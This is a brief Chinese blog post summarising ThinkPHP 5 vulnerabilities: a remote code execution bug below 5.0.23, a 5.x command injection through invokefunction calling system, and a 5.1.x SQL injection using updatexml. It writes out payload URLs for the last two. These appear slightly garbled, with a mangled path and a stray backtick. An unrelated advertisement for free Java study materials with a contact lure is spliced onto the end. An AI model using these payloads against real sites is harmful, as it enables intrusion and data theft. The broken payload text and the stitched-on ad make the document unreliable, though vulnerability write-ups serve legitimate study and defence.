目录
前言
一、远程代码执行漏洞
1.1 影响范围
1.2 漏洞详情
二、5.x远程命令注入
三、5.1.x SQL注入
前言
thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞,thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5的漏洞
一、远程代码执行漏洞
1.1 影响范围
thinkphp<5.0.23
1.2 漏洞详情
这个版本中因为method方法没有准确处理变量名,导致可以在request方法中构造参数执行系统命令
二、5.x远程命令注入
由于没有开启强制路由,未对路由的控制器进行过滤,导致远程命令执行。
payload :
http://xx.xx.xx.xx/s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令参数
三、5.1.x SQL注入
由于服务器处理order by的参数时,未对数组进行过滤,若传入的参数为数组,则会导致漏洞产生
payload:
index.phpids[0,updatexml(0,concat(0xa,user()),0)]=1`
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦